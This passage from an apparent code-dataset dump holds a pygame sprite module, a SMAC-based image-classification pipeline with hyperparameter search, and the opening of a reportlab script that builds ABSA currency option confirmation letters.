\"\"\"Update the sprite's walkframes as the sprite's direction changes.\"\"\"\n if self.direction != self.old_direction:\n self.walkframes = self.walkframe_dict[self.direction]\n self.old_direction = self.direction\n self.redraw = True\n self.make_image(now)\n\n def make_image(self, now):\n \"\"\"Update the sprite's 
animation as needed.\"\"\"\n if self.redraw or now-self.animate_timer > 1000/self.animate_fps:\n self.image = next(self.walkframes)\n self.animate_timer = now\n self.dirty = 1\n self.redraw = False\n\n def add_direction(self, direction):\n \"\"\"\n Add direction to the sprite's direction stack and change current\n direction.\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n self.direction_stack.append(direction)\n self.direction = direction\n\n def pop_direction(self, direction):\n \"\"\"\n Remove direction from direction stack and change current direction\n to the top of the stack (if not empty).\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n if self.direction_stack:\n self.direction = self.direction_stack[-1]\n \n def bounce(self, rect, direction, bounce_amount=4):\n \"\"\"\n Bounce sprite off an obstacle by bounce amount in the opposite\n direction the sprite is travelling. \n \"\"\"\n offsets = {\"LEFT\": (rect.right - (self.footprint.left - bounce_amount), 0),\n \"RIGHT\": (rect.left - (self.footprint.right + bounce_amount), 0),\n \"UP\": (0, rect.bottom - (self.footprint.top - bounce_amount)),\n \"DOWN\": (0, rect.top - (self.footprint.bottom + bounce_amount))}\n self.rect.move_ip(offsets[direction])\n self.footprint.midbottom = self.rect.midbottom\n \n def update(self, now, screen_rect, all_sprites, wrapped_sprites):\n \"\"\"Update image and position of sprite.\"\"\"\n self.adjust_images(now)\n self.wrap_move(screen_rect)\n if self.rect.clamp(screen_rect) != self.rect:\n self.screen_wrap(screen_rect, all_sprites, wrapped_sprites)\n self.dirty = 1\n \n if self.direction_stack:\n direction_vector = prepare.DIRECT_DICT[self.direction]\n self.rect.x += self.speed*direction_vector[0]\n self.rect.y += self.speed*direction_vector[1]\n self.dirty = 1\n self.footprint.midbottom = self.rect.midbottom\n \n def draw(self, surface):\n \"\"\"Draw sprite to surface (not used if using group draw functions).\"\"\"\n return surface.blit(self.image, self.rect)\n \n\nclass Player(RPGSprite):\n \"\"\"This class will represent the user controlled character.\"\"\"\n def __init__(self, pos, speed, footprint_size, name=\"warrior_m\", facing=\"DOWN\", *groups):\n super(Player, self).__init__(pos, speed, footprint_size, name, facing, *groups)\n\n def get_event(self, event):\n \"\"\"Handle events pertaining to player control.\"\"\"\n if event.type == pg.KEYDOWN:\n self.add_direction(event.key)\n elif event.type == pg.KEYUP:\n self.pop_direction(event.key)\n\n def update(self, now, screen_rect, all_sprites, wrapped_sprites):\n \"\"\"Call base classes update method and clamp player to screen.\"\"\"\n super(Player, self).update(now, screen_rect, all_sprites, wrapped_sprites)\n \n def collide_with_walls(self, walls):\n \"\"\"\n Bounce off the first wall in walls (a list of allwalls that the sprite collides with).\n Only responding to one collision per tick avoids rattling around in corners or\n \"bouncing\" multiple times.\n \"\"\" \n self.bounce(walls[0].footprint, self.direction)\n\n def add_direction(self, key):\n \"\"\"Remove direction from stack if corresponding key is released.\"\"\"\n if key in prepare.CONTROLS:\n super(Player, self).add_direction(prepare.CONTROLS[key])\n\n def pop_direction(self, key):\n \"\"\"Add direction to stack if corresponding key is pressed.\"\"\"\n if key in prepare.CONTROLS:\n super(Player, self).pop_direction(prepare.CONTROLS[key])\n\n\nclass AISprite(RPGSprite):\n \"\"\"A non-player controlled 
sprite.\"\"\"\n def __init__(self, pos, speed, footprint_size, name, facing, *groups):\n super(AISprite, self).__init__(pos, speed, footprint_size, name, facing, *groups)\n self.wait_range = (500, 2000)\n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = 0.0\n self.change_direction()\n\n def update(self, now, screen_rect, all_sprites, wrapped_sprites):\n \"\"\"\n Choose a new direction if wait_time has expired or the sprite\n attempts to leave the screen.\n \"\"\"\n if now-self.wait_time > self.wait_delay:\n self.change_direction(now)\n super(AISprite, self).update(now, screen_rect, all_sprites, wrapped_sprites)\n \n def collide_with_walls(self, walls):\n \"\"\"\n Bounce off the first wall in walls (a list of allwalls that the sprite collides with)\n and change direction to something other than the sprite's current direction.\n \"\"\"\n self.bounce(walls[0].footprint, self.direction)\n self.change_direction(restricted=self.direction)\n \n def change_direction(self, now=0, restricted=None):\n \"\"\"\n Empty the stack and choose a new direction. The sprite may also\n choose not to go idle (choosing direction=None). Passing a direction\n as restricted eliminates that direction and None from the possible\n new directions.\n \"\"\"\n self.direction_stack = []\n directions = list(prepare.DIRECTIONS + (None, ))\n if restricted:\n directions.remove(restricted)\n directions.remove(None)\n direction = random.choice(directions)\n if direction:\n super(AISprite, self).add_direction(direction)\n \n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = now\n\n\nclass Obstacle(pg.sprite.DirtySprite):\n def __init__(self, pos, footprint_size, *groups):\n super(Obstacle, self).__init__(*groups)\n self.image = prepare.GFX[\"stone\"]\n self.rect = self.image.get_rect(topleft=pos)\n self.footprint = pg.Rect((0,0), footprint_size)\n self.footprint.midbottom = self.rect.midbottom\n","sub_path":"actors.py","file_name":"actors.py","file_ext":"py","file_size_in_byte":10498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"172471312","text":"import numpy as np\nimport os\nfrom smac.configspace import ConfigurationSpace\nfrom ConfigSpace.hyperparameters import CategoricalHyperparameter, UniformFloatHyperparameter, UniformIntegerHyperparameter\nfrom ConfigSpace.conditions import InCondition\nfrom smac.tae.execute_func import ExecuteTAFuncDict\nfrom smac.scenario.scenario import Scenario\nfrom smac.facade.smac_facade import SMAC\nfrom sklearn.model_selection import train_test_split\nfrom mahotas.features import haralick\nimport cv2\n# from keras.applications.vgg19 import VGG19\n# from keras.applications.inception_v3 import InceptionV3\n# from keras.applications.vgg19 import preprocess_input\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import Isomap\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom mahotas.features import surf\nimport pickle\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn import metrics\nfrom sklearn.preprocessing import Normalizer\n\ndataset = 'breast'\n\ndef haralick_all_features(X, distance=1):\n\tf = []\n\tfor i in range(len(X)):\n\t\tI = cv2.imread(X[i])\n\t\tif I is None or I.size == 0 or np.sum(I[:]) == 0 or I.shape[0] == 0 or I.shape[1] == 0:\n\t\t\th = np.zeros((1, 13))\n\t\telse:\n\t\t\tI = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n\t\t\th = haralick(I, distance=distance, return_mean=True, ignore_zeros=False)\n\t\t\th = np.expand_dims(h, 
0)\n\t\tif i == 0:\n\t\t\tf = h\n\t\telse:\n\t\t\tf = np.vstack((f, h))\n\treturn f\n\ndef surf_all_features(X, octaves=4, scales=6):\n\tf = []\n\tfor i in range(len(X)):\n\t\tI = cv2.imread(X[i])\n\t\tI = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n\t\th = surf.surf(I, nr_octaves=octaves, nr_scales=scales, max_points=100)\n\t\th = h.flatten()\n\t\th = np.expand_dims(h, 0)\n\t\tif i == 0:\n\t\t\tf = h\n\t\telse:\n\t\t\tf = np.vstack((f, h))\n\treturn f\n\ndef CNN_all_features(names, cnn):\n\tfrom keras.applications.vgg19 import VGG19\n\tfrom keras.applications.inception_v3 import InceptionV3\n\tfrom keras.applications.vgg19 import preprocess_input\n\tf = []\n\tif cnn == 'VGG':\n\t\tmodel = VGG19(weights='imagenet')\n\t\tdsize = (224, 224)\n\telse:\n\t\tmodel = InceptionV3(weights='imagenet')\n\t\tdsize = (299, 299)\n\tfor i in range(len(names)):\n\t\timg = cv2.imread(names[i])\n\t\timg = cv2.resize(img, dsize=dsize)\n\t\timg = img.astype('float32')\n\t\tx = np.expand_dims(img, axis=0)\n\t\tx = preprocess_input(x)\n\t\tfeatures = model.predict(x)\n\t\tif i == 0:\n\t\t\tf = features\n\t\telse:\n\t\t\tf = np.vstack((f, features))\n\treturn f\n\n\ndef VGG_all_features(names, X):\n\thome = os.path.expanduser('~')\n\tif os.path.exists(home + '/Documents/research/EP_project/data/features/VGG_' + dataset + '.npz'):\n\t\tf = np.load(open(home + '/Documents/research/EP_project/data/features/VGG_' + dataset + '.npz', 'rb'))\n\t\treturn f.f.arr_0[X, :]\n\telse:\n\t\tf = CNN_all_features(names, 'VGG')\n\t\tnp.savez(open(home + '/Documents/research/EP_project/data/features/VGG_' + dataset + '.npz', 'wb'), f)\n\t\treturn f[X, :]\n\ndef inception_all_features(names, X):\n\thome = os.path.expanduser('~')\n\tif os.path.exists(home + '/Documents/research/EP_project/data/features/inception_' + dataset + '.npz'):\n\t\tf = np.load(open(home + '/Documents/research/EP_project/data/features/inception_' + dataset + '.npz', 'rb'))\n\t\treturn f.f.arr_0[X, :]\n\telse:\n\t\tf = CNN_all_features(names, 'inception')\n\t\tnp.savez(open(home + '/Documents/research/EP_project/data/features/inception_' + dataset + '.npz', 'wb'), f)\n\t\treturn f[X, :]\n\n\ndef principal_components(X, whiten=True):\n\tpca = PCA(whiten=whiten)\n\tmaxvar = 0.95\n\tdata = X\n\tX1 = pca.fit(X)\n\tvar = pca.explained_variance_ratio_\n\ts = 0\n\tfor i in range(len(var)):\n\t\ts += var[i]\n\t\tif s >= maxvar:\n\t\t\tbreak\n\tpca = PCA(n_components=i+1)\n\tpca.fit(data)\n\treturn pca\n\n\ndef isomap(X, n_neighbors=5, n_components=2):\n\tiso = Isomap(n_components=n_components, n_neighbors=n_neighbors)\n\tiso.fit(X)\n\treturn iso\n\ndef random_forests(X, y, n_estimators, max_features):\n\tclf = RandomForestClassifier(n_estimators=n_estimators, max_features=max_features, class_weight='balanced')\n\tclf.fit(X, y)\n\treturn clf\n\ndef support_vector_machines(X, y, C, gamma):\n\tclf = svm.SVC(C=C, gamma=gamma, class_weight='balanced', probability=True)\n\tclf.fit(X, y)\n\treturn clf\n\ncs = ConfigurationSpace()\n\nfeature_extraction = CategoricalHyperparameter(\"feature_extraction\", [\"haralick\", \"VGG\", \"Inception\"], default=\"haralick\")\ncs.add_hyperparameter(feature_extraction)\n\n# dimensionality_reduction = CategoricalHyperparameter(\"dimensionality_reduction\", [\"PCA\", \"ISOMAP\"], default=\"PCA\")\n# cs.add_hyperparameter(dimensionality_reduction)\n\nlearning_algorithm = CategoricalHyperparameter(\"learning_algorithm\", [\"SVM\", \"RF\"], default=\"RF\")\ncs.add_hyperparameter(learning_algorithm)\n\nharalick_distance = 
UniformIntegerHyperparameter(\"haralick_distance\", 1, 3, default=1)\ncs.add_hyperparameter(haralick_distance)\ncond1 = InCondition(child=haralick_distance, parent=feature_extraction, values=[\"haralick\"])\ncs.add_condition(cond1)\n\n# surf_octaves = UniformIntegerHyperparameter(\"surf_octaves\", 3, 6, default=4)\n# surf_scales = UniformIntegerHyperparameter(\"surf_scales\", 5, 8, default=6)\n# cs.add_hyperparameters([surf_octaves, surf_scales])\n# cond1 = InCondition(child=surf_octaves, parent=feature_extraction, values=[\"SURF\"])\n# cond2 = InCondition(child=surf_scales, parent=feature_extraction, values=[\"SURF\"])\n# cs.add_conditions([cond1, cond2])\n\n\nsvm_C = UniformFloatHyperparameter(\"svm_C\", 0.1, 100.0, default=1.0)\ncs.add_hyperparameter(svm_C)\nsvm_gamma = UniformFloatHyperparameter(\"svm_gamma\", 0.01, 8, default=1)\ncs.add_hyperparameter(svm_gamma)\ncond1 = InCondition(child=svm_C, parent=learning_algorithm, values=[\"SVM\"])\ncond2 = InCondition(child=svm_gamma, parent=learning_algorithm, values=[\"SVM\"])\ncs.add_conditions([cond1, cond2])\n\n# pca_whiten = CategoricalHyperparameter(\"pca_whiten\", [True, False], default=True)\n# cs.add_hyperparameter(pca_whiten)\n# cs.add_condition(InCondition(child=pca_whiten, parent=dimensionality_reduction, values=[\"PCA\"]))\n\n# isomap_n_neighbors = UniformIntegerHyperparameter(\"isomap_n_neighbors\", 3, 7, default=5)\n# isomap_n_components = UniformIntegerHyperparameter(\"isomap_n_components\", 2, 4, default=2)\n# cs.add_hyperparameters([isomap_n_neighbors, isomap_n_components])\n# cs.add_condition(InCondition(child=isomap_n_components, parent=dimensionality_reduction, values=[\"ISOMAP\"]))\n# cs.add_condition(InCondition(child=isomap_n_neighbors, parent=dimensionality_reduction, values=[\"ISOMAP\"]))\n\n\nrf_n_estimators = UniformIntegerHyperparameter(\"rf_n_estimators\", 8, 300, default=10)\nrf_max_features = UniformFloatHyperparameter(\"rf_max_features\", 0.3, 0.8, default=0.5)\ncs.add_hyperparameters([rf_max_features, rf_n_estimators])\ncond1 = InCondition(child=rf_n_estimators, parent=learning_algorithm, values=[\"RF\"])\ncond2 = InCondition(child=rf_max_features, parent=learning_algorithm, values=[\"RF\"])\ncs.add_conditions([cond1, cond2])\n\ndef pipeline_from_cfg(cfg):\n\tcfg = {k : cfg[k] for k in cfg if cfg[k]}\n\t# Load the data\n\thome = os.path.expanduser('~')\n\tdata_home = home + '/Documents/research/EP_project/data/datasets/' + dataset + '/'\n\tl1 = os.listdir(data_home)\n\ty = []\n\tnames = []\n\tcnt = 0\n\tfor z in range(len(l1)):\n\t\tif l1[z][0] == '.':\n\t\t\tcontinue\n\t\tl = os.listdir(data_home + l1[z] + '/')\n\t\ty += [z] * len(l)\n\t\tcnt += 1\n\t\tfor i in range(len(l)):\n\t\t\tnames.append(data_home+l1[z]+'/'+l[i])\n\t# Train val split\n\tX = np.empty((len(y), 1))\n\tindices = np.arange(len(y))\n\tX1, _, y1, y_val, id1, _ = train_test_split(X, y, indices, test_size=0.2, random_state=42, shuffle=True)\n\ts = []\n\tf11 = []\n\tval_splits = 3\n\tkf = StratifiedKFold(n_splits=val_splits, random_state=42, shuffle=True)\n\tnames1 = []\n\tfor i in range(len(id1)):\n\t\tnames1.append((names[id1[i]]))\n\tfor idx1, idx2 in kf.split(X1, y1):\n\t\t# Feature extraction\n\t\tids1 = []\n\t\tX_train = []\n\t\ty_train = []\n\t\tfor i in idx1:\n\t\t\tX_train.append(names1[i])\n\t\t\ty_train.append(y1[i])\n\t\t\tids1.append(id1[i])\n\t\tX_val = []\n\t\ty_val = []\n\t\tids2 = []\n\t\tfor i in idx2:\n\t\t\tX_val.append(names1[i])\n\t\t\ty_val.append(y1[i])\n\t\t\tids2.append(id1[i])\n\t\t# Feature extraction\n\t\tf_train 
= []\n\t\t# f_test = []\n\t\tf_val = []\n\t\tif cfg[\"feature_extraction\"] == \"haralick\":\n\t\t\tf_val = haralick_all_features(X_val, cfg[\"haralick_distance\"])\n\t\t\tf_train = haralick_all_features(X_train, cfg[\"haralick_distance\"])\n\t\telif cfg[\"feature_extraction\"] == \"VGG\":\n\t\t\tf_val = VGG_all_features(names, ids2)\n\t\t\tf_train = VGG_all_features(names, ids1)\n\t\telif cfg[\"feature_extraction\"] == \"Inception\":\n\t\t\tf_val = inception_all_features(names, ids2)\n\t\t\tf_train = inception_all_features(names, ids1)\n\n\t\t# Dimensionality reduction\n\t\tr1 = np.random.choice([1, 2], 1)\n\t\tif r1[0] == 1:\n\t\t\tpca_whiten = np.random.choice([True, False], 1)[0]\n\t\t\tdr = principal_components(f_train, pca_whiten)\n\t\t\tf_train = dr.transform(f_train)\n\t\t\tf_val = dr.transform(f_val)\n\n\t\telif r1[0] == 2:\n\t\t\tisomap_n_neighbors = np.random.choice([3, 4, 5, 6, 7], 1)[0]\n\t\t\tisomap_n_components = np.random.choice([2, 3, 4], 1)[0]\n\t\t\tdr = isomap(f_train, isomap_n_neighbors, isomap_n_components)\n\t\t\tf_train = dr.transform(f_train)\n\t\t\tf_val = dr.transform(f_val)\n\n\t\t# Pre-processing\n\t\tnormalizer = Normalizer().fit(f_train)\n\t\tf_train = normalizer.transform(f_train)\n\t\tf_val = normalizer.transform(f_val)\n\n\t\t# Learning algorithms\n\t\tif cfg[\"learning_algorithm\"] == \"RF\":\n\t\t\tclf = random_forests(f_train, y_train, cfg[\"rf_n_estimators\"], cfg[\"rf_max_features\"])\n\t\telif cfg[\"learning_algorithm\"] == \"SVM\":\n\t\t\tclf = support_vector_machines(f_train, y_train, cfg[\"svm_C\"], cfg[\"svm_gamma\"])\n\t\tp_pred = clf.predict_proba(f_val)\n\t\tf11.append(metrics.log_loss(y_val, p_pred))\n\t\ts.append(clf.score(f_val, y_val))\n\treturn np.mean(f11)\n\ndef test_pipeline_from_cfg(cfg):\n\tcfg = {k : cfg[k] for k in cfg if cfg[k]}\n\t# Load the data\n\thome = os.path.expanduser('~')\n\tdata_home = home + '/Documents/research/EP_project/data/datasets/' + dataset + '/'\n\tl1 = os.listdir(data_home)\n\ts = []\n\tf11 = []\n\tfor k in range(50):\n\t\tcfg = incumbent\n\t\tr1 = np.random.choice([1, 2], 1)\n\t\tdimensionality_reduction = \"PCA\"\n\t\tif r1[0] == 1:\n\t\t\tdimensionality_reduction = \"PCA\"\n\t\telif r1[0] == 2:\n\t\t\tdimensionality_reduction = \"ISOMAP\"\n\t\tX = np.empty((1, 960, 960, 3))\n\t\ty = []\n\t\tnames = []\n\t\tcnt = 0\n\t\tfor z in range(len(l1)):\n\t\t\tif l1[z][0] == '.':\n\t\t\t\tcontinue\n\t\t\tl = os.listdir(data_home + l1[z] + '/')\n\t\t\ty += [z] * len(l)\n\t\t\tcnt += 1\n\t\t\tfor i in range(len(l)):\n\t\t\t\tnames.append(data_home+l1[z]+'/'+l[i])\n\t\t# Train val split\n\t\tX = np.empty((len(y), 1))\n\t\tindices = np.arange(len(y))\n\t\t_, _, y_train, y_val, idx1, idx2 = train_test_split(X, y, indices, test_size=0.2, random_state=42, shuffle=True)\n\n\t\tX_train = []\n\t\tfor i in idx1:\n\t\t\tX_train.append(names[i])\n\t\tX_val = []\n\t\tfor i in idx2:\n\t\t\tX_val.append(names[i])\n\n\t\t# Feature extraction\n\t\tf_train = []\n\t\t# f_test = []\n\t\tf_val = []\n\t\tif cfg[\"feature_extraction\"] == \"haralick\":\n\t\t\tf_val = haralick_all_features(X_val, cfg[\"haralick_distance\"])\n\t\t\tf_train = haralick_all_features(X_train, cfg[\"haralick_distance\"])\n\t\telif cfg[\"feature_extraction\"] == \"VGG\":\n\t\t\tf_val = VGG_all_features(names, idx2)\n\t\t\tf_train = VGG_all_features(names, idx1)\n\t\telif cfg[\"feature_extraction\"] == \"Inception\":\n\t\t\tf_val = inception_all_features(names, idx2)\n\t\t\tf_train = inception_all_features(names, idx1)\n\n\t\t# Dimensionality reduction\n\t\tif 
dimensionality_reduction == \"PCA\":\n\t\t\tpca_whiten = np.random.choice([True, False], 1)[0]\n\t\t\tdr = principal_components(f_train, pca_whiten)\n\t\t\tf_train = dr.transform(f_train)\n\t\t\tf_val = dr.transform(f_val)\n\n\t\telif dimensionality_reduction == \"ISOMAP\":\n\t\t\tisomap_n_neighbors = np.random.choice([3, 4, 5, 6, 7], 1)[0]\n\t\t\tisomap_n_components = np.random.choice([2, 3, 4], 1)[0]\n\t\t\tdr = isomap(f_train, isomap_n_neighbors, isomap_n_components)\n\t\t\tf_train = dr.transform(f_train)\n\t\t\tf_val = dr.transform(f_val)\n\n\t\t# Pre-processing\n\t\tnormalizer = Normalizer().fit(f_train)\n\t\tf_train = normalizer.transform(f_train)\n\t\tf_val = normalizer.transform(f_val)\n\n\t\t# Learning algorithms\n\t\tif cfg[\"learning_algorithm\"] == \"RF\":\n\t\t\tclf = random_forests(f_train, y_train, cfg[\"rf_n_estimators\"], cfg[\"rf_max_features\"])\n\t\telif cfg[\"learning_algorithm\"] == \"SVM\":\n\t\t\tclf = support_vector_machines(f_train, y_train, cfg[\"svm_C\"], cfg[\"svm_gamma\"])\n\t\tp_pred = clf.predict_proba(f_val)\n\t\tf11.append(metrics.log_loss(y_val, p_pred))\n\t\ts.append(clf.score(f_val, y_val))\n\treturn np.mean(f11)\n\n\nscenario = Scenario({\"run_obj\": \"quality\",\n\t\t\t\t\t \"run_count-limit\": 200,\n\t\t\t\t\t \"cs\": cs,\n\t\t\t\t\t \"deterministic\": \"true\"})\n\n\ndef write_dict(f, dict):\n\tk = dict.keys()\n\tfor i in k:\n\t\tf.write(i + ':' + str(dict[i]) + '\\n')\n\nhome = os.path.expanduser('~')\nsmac = SMAC(scenario=scenario, rng=np.random.RandomState(42), tae_runner=pipeline_from_cfg)\nincumbent = smac.optimize()\npickle.dump(incumbent, open(home + '/Documents/research/EP_project/results/intermediate/smac_dimensionality_reduction_' + dataset + '.pkl', 'wb'), -1)\n# pickle.dump(smac, open(home + '/Documents/research/EP_project/results/intermediate/smac_object_dimensionality_reduction_' + dataset + '.pkl', 'wb'), -1)\ninc_value = pipeline_from_cfg(incumbent)\nprint(\"DIMENSIONALITY REDUCTION AGNOSTIC RESULTS: \\n\")\nprint(\"Validation score: \" + str(inc_value) + '\\n')\nprint(\"Algorithms and hyper-parameters: \\n\")\nprint(incumbent._values)\n\ninc_value1 = test_pipeline_from_cfg(incumbent)\nprint(\"Test score: \" + str(inc_value1) + '\\n')\n\n\nresults_home = home + '/Documents/research/EP_project/results/experiments/'\nf = open(results_home + 'smac_' + dataset + '.txt', 'a')\nf.write(\"DIMENSIONALITY REDUCTION AGNOSTIC RESULTS: \\n\")\nf.write(\"Validation score: \" + str(inc_value) + '\\n')\nf.write(\"Algorithms and hyper-parameters: \\n\")\nwrite_dict(f, incumbent._values)\nf.write(\"Test score: \" + str(inc_value1) + '\\n')\nf.close()\n","sub_path":"prototypes/smac_pipeline_agnostic_dimensionality_reduction.py","file_name":"smac_pipeline_agnostic_dimensionality_reduction.py","file_ext":"py","file_size_in_byte":13609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"188509144","text":"import ael\nimport time\nfrom reportlab.pdfgen.canvas import Canvas\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.lib.units import inch, cm\nfrom reportlab.platypus import Paragraph, Frame, Spacer\nfrom STATIC_TEMPLATE import BuildLogos, BuildFooter\nfrom zak_funcs import formnum\nfrom PIL import Image\n\n\ndef ShortMod1(canvas, t):\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n styleSheet = getSampleStyleSheet() \n \n Text1 = (' ')\n Text2 =('The purpose of this letter agreement (this \"Confirmation\") is to confirm the terms and 
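# The SMAC pipeline above gates hyperparameters on their parent algorithm via
# InCondition; a minimal standalone ConfigSpace sketch of that pattern, written
# against the same (older) ConfigSpace API with the default= keyword. svm_C is
# only active -- and only sampled -- when learning_algorithm == "SVM".
from ConfigSpace.configuration_space import ConfigurationSpace
from ConfigSpace.hyperparameters import CategoricalHyperparameter, UniformFloatHyperparameter
from ConfigSpace.conditions import InCondition

cs = ConfigurationSpace()
algo = CategoricalHyperparameter("learning_algorithm", ["SVM", "RF"], default="RF")
svm_C = UniformFloatHyperparameter("svm_C", 0.1, 100.0, default=1.0)
cs.add_hyperparameters([algo, svm_C])
cs.add_condition(InCondition(child=svm_C, parent=algo, values=["SVM"]))

for cfg in cs.sample_configuration(5):
    print(cfg.get_dictionary())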
conditions of the\\\n transaction referred to above and entered into on the Trade Date specified below (\"this Transaction\"), between\\\n Absa Bank Limited (\"ABSA\") and ' + t.counterparty_ptynbr.fullname +' (\"Counterparty\"). This Confirmation supersedes any previous Confirmation\\\n or other communication with respect to this Transaction and evidences a complete and binding agreement between \\\n us as to the terms of this Transaction. This communication constitutes a Confirmation as referred to in the\\\n Agreement specified below.')\n \n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12,\\\n spaceAfter =255, alignment = 4)\n \n para1 = Paragraph(Text1, bodyStyle1)\n para2 = Paragraph(Text2, bodyStyle1)\n \n mydata = [para1, para2]\n \n frame.addFromList(mydata, canvas)\n \ndef ShortMod2(canvas, t):\n \n #ISDA Master Agreement Date\n nbr = t.counterparty_ptynbr.ptynbr\n a = ael.Agreement.select(\"counterparty_ptynbr = %i\" %nbr)\n ISDA = '0001-01-01'\n for i in a:\n if i.dated == ' ':\n ISDA = '0001-01-01'\n else: \n ISDA = i.dated.to_string('%d %B %Y')\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0 )\n \n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(1.5 * cm, 15.73*cm, '1.')\n Text2 = ('This Confirmation supplements, forms a part of and is subject to, the ISDA Master Agreement\\\n entered into between Absa and the Counterparty dated as of '+ISDA+', as amended and supplemented\\\n from time to time (the \"Agreement\"). All provisions contained in the Agreement govern this\\\n Confirmation except as expressly modified below.')\n Text1 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =330,\\\n alignment = 4, leftIndent = 15)\n \n para1 = Paragraph(Text1, bodyStyle1)\n para2 = Paragraph(Text2, bodyStyle1)\n \n mydata = [para1, para2]\n \n frame.addFromList(mydata, canvas)\n \ndef ShortMod3(canvas):\n \n canvas.drawString(4.5 * cm, 20.0*cm, 'OTC Currency Option Transaction') # Subject\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(1.5 * cm, 14.0*cm, '2.')\n Text1 = ('Definitions. This Confirmation is subject to and incorporates the 2006 ISDA Definitions as\\\n published by the International Swap Derivatives Association, Inc. (\"ISDA\") and the 1998 FX and Currency\\\n Option Definitions as published by ISDA, the Emerging Markets Traders Association and The Foreign Exchange\\\n Committee (the \"FX Definitions\", and together with the 2006 Definitions, the \"Definitions\"). In the event\\\n of any inconsistency between this Confirmation and the Definitions or the Agreement, this Confirmation will\\\n govern for the purposes of the Transaction. In the event of any inconsistency between the 2000 Definitions\\\n and the FX Definitions, the FX Definitions will govern. References herein to a \"Transaction\" shall be\\\n deemed to be references to a \"Swap Transaction\" for the purposes of the Definitions. 
Capitalised terms\\\n used in this Confirmation and not defined in this Confirmation or the Definitions shall have the respective\\\n meanings assigned in the Agreement.\"')\n \n Text2 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =380,\\\n alignment = 4, leftIndent = 15)\n \n para1 = Paragraph(Text1, bodyStyle1)\n para2 = Paragraph(Text2, bodyStyle1)\n \n mydata = [para2, para1]\n \n frame.addFromList(mydata, canvas)\n canvas.showPage() \n \ndef ShortMod4(canvas):\n\n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(3.4 * cm, 23.3*cm, '(ii)')\n canvas.drawString(4.1 * cm, 20.39*cm, '(a)')\n canvas.drawString(4.1 * cm, 19.45*cm, '(b)')\n canvas.drawString(4.1 * cm, 18.53*cm, '(c)')\n canvas.drawString(3.4 * cm, 15.93*cm, '(iv) ')\n canvas.drawString(3.4 * cm, 14.5*cm, '(i) ')\n canvas.drawString(3.4 * cm, 13.65*cm, '(ii) ')\n canvas.drawString(3.4 * cm, 12.2*cm, '(i) ')\n canvas.drawString(3.4 * cm, 11.29*cm, '(ii) ')\n \n Text1 =('4. Additional Representations:')\n Text3 =('Additional Representations, as defined and contemplated in the Agreement, will apply and for the purpose\\\n of Section 3 of the Agreement, each of the following will constitute an Additional Representation in respect\\\n of this Transaction. In respect of each Additional Representation each of us as a party to the Transaction\\\n represents to the other on the date on which this Transaction is entered into and will be deemed to\\\n represent continuously for the duration of the term of this Transaction and at all times until the \\\n termination of this Transaction that:')\n Text4 =('4.1 Non Reliance. ') \n Text5 =('(i) Each of us is acting for its own account, ') \n Text6 =(' Each of us has made its own independent decisions based upon its own judgment and upon advice from such\\\n advisors as it has deemed necessary to obtain as to whether or not:')\n Text7 =('(a) to enter into this Transaction,')\n Text8 =('(b) it is suitable, appropriate or proper to enter in this Transaction,')\n Text9 =('(c) it has the capacity to enter into this Transaction;')\n Text10 =('(iii) Each of us has entered into this Transaction:')\n Text11 =(' in reliance upon such investment, financial, legal, regulatory, tax, accounting, actuarial and other advice as it deemed necessary;') \n Text12 =(' not relying in any manner on any view, proposal, guidance, advice or opinion expressed by the other one of us;')\n Text13 =(' not relying in any manner on any communication (written or oral) of the other one of us as investment,\\\n financial, legal, regulatory, tax, accounting, actuarial and other advice, it being understood that any\\\n information and explanations relating to the terms and conditions of this Transaction shall not be \\\n considered or construed as investment, financial, legal, regulatory, tax, accounting, actuarial and \\\n other advice or as a proposal, guidance or recommendation to enter into this Transaction;') \n Text14 =(' None of us has received from the other one any assurance, warranty or guarantee as to the expected\\\n results or financial or investment returns of or related to this Transaction.')\n Text15 =('4.2 Assessment and Understanding.') \n Text16 =('Each of us is capable of assessing the merits of and understanding, and in fact understands and\\\n accepts the terms, conditions of, associated with and related to this Transaction; and') \n Text17 =('Each of us is 
capable of assessing and assuming the risks of whatsoever nature, and in fact\\\n accepts and assumes all the risks of, associated with and related to this Transaction.')\n Text18 =('4.3 Status of Parties.')\n Text19 =(' None of us is acting as a fiduciary for or as an advisor of whatsoever nature or kind to the other\\\n one of us in respect of this Transaction;') \n Text20 =(' Each of us will be liable as principal for its own obligations under this Transaction read with\\\n the Agreement and schedule elections incorporated by reference in this Confirmation.')\n Text21 =('4.4 Purpose.') \n Text22 =('Each of us has entered into this Transaction:') \n Text23 =('(i) for the purpose of managing its borrowings or investments, and/or')\n Text24 =('(ii) for the purpose of hedging its assets or liabilities; and/or')\n Text25 =('(iii) in connection with a line of its business.')\n \n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle2 = ParagraphStyle('Text', 